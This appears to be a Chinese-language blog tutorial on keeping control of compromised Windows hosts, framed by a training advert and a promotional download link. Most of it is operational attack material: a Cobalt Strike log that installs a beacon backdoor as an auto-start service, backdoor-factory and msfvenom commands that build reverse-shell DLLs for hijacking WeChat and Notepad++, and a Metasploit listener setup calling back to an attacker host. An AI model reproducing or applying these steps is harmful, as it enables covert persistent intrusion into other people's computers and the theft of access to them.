0x000-前文
有技術交流或滲透測試培訓需求的朋友歡迎聯繫QQ547006660
2000人網絡安全交流羣,歡迎大佬們來玩
羣號820783253
0x001-右鍵菜單實現控制持久化
在windows中,拿到目標主機權限後,,維持權限是必不可少的工作。
目前常見的手法有:
1.註冊表
2.啓動項
3.計時任務
4.設置服務
5.shift後門
6.dll劫持(白加黑)
7.利用其他安裝的軟件
在我之前給出的插件中,已經包含了控制持久化的插件
如圖,裏面包含了很多控制持久化的方法,可自動執行
前幾個Persist(※)貌似都是劫持關鍵程序的dll實現控制持久化
Sticky Keys是大家熟悉的粘滯鍵後門(shift後門,摁五下shift彈出cmd窗口)
Scheduled Job方法爲寫計劃任務維持權限
最後一個我也沒整明白什麼意思,大牛們知道嘛?
利用這個菜單實現控制持久化雖然方便,但是存在一定的侷限,也有很多問題,下面簡單講兩種個人常用的維持權限的方法
0x002-Windows Service維持權限
在cobaltstrike中生成一個Windows service服務後門
導出時後門名爲beacon.exe
隨後在beacon中執行如下命令
beacon> cd C:\WINDOWS\Temp\
[] cd C:\WINDOWS\Temp\
[+] host called home, sent: 24 bytes
beacon> upload /root/beacon.exe
[] Tasked beacon to upload /root/beacon.exe as beacon.exe
[+] host called home, sent: 309782 bytes
beacon> shell sc create "thisisserver" binpath= "C:\WINDOWS\Temp\beacon.exe"
[] Tasked beacon to run: sc create "thisisserver" binpath= "C:\WINDOWS\Temp\beacon.exe"
[+] host called home, sent: 93 bytes
[+] received output:
[SC] CreateService 成功
beacon> shell sc description "thisisserver" "description"
[] Tasked beacon to run: sc description "thisisserver" "description"
[+] host called home, sent: 74 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功
beacon> shell sc config "thisisserver" start= auto
[] Tasked beacon to run: sc config "thisisserver" start= auto
[+] host called home, sent: 67 bytes
[+] received output:
[SC] ChangeServiceConfig 成功
beacon> shell net start "thisisserver"
[] Tasked beacon to run: net start "thisisserver"
[+] host called home, sent: 55 bytes*
這樣的話目標機每次開機,都會運行你的beacon.exe後門,實現控制的持久化。
當然,如果目標主機存在殺毒全家桶的話,那麼對你後門的免殺是有很高要求的,至於cobaltstrike後門的免殺,打算過一段時間做個番外篇講,老鐵們可以關注下~
0x003-dll劫持(白加黑)維持權限
Dll劫持的話,主要是劫持那些經常運行程序的dll,這樣程序一運行,就會加載我們的惡意dll。實現控制持久化
我們來看一個例子,劫持微信的dll
首先使用Process Explore查看微信調用的dll
本次測試,是劫持的他的d3dcompiler_47.dll
使用backdoor factory製作dll後門(保存在目錄的backdoored文件夾下)
鏈接:https://github.com/secretsquirrel/the-backdoor-factory
命令如下
python backdoor.py -f d3dcompiler_47.dll -s reverse_shell_tcp_inline -P 6666 -H 8.8.8.8(你的teamserver)
把這個加了後門的dll放到微信程序的文件夾下
用cobaltstrike配置一個tcp協議監聽6666端口的Listener,或者nc監聽6666端口,目標機運行微信時,即可收到反彈的shell
再看一個,劫持notepad的dll:
我們首先打開Kali,用Metasploit或者cobaltstrike來生成一個dll木馬
Metasploit生成dll後門命令
msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.199.107 lport=6666 -f dll > ./Msimg32.dll
Cobaltstrike生成dll後門方法
然後配置6666端口的監聽
Metasploit:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.199.107
set lport 6666
exploit
Cobaltstrike配置監聽
請看教程第二節
然後我們把dll放到notepad文件夾中,運行notpad++,即可返回會話。
0x004-小福利
分享一下今天剛剛買的1000多套PPT模板,有了這些模板,做課件輕輕鬆鬆~
回覆即可下載
鏈接:https://pan.baidu.com/s/1SGCyFtuQsd0yzKAIMvRLyQ
提取碼:6x55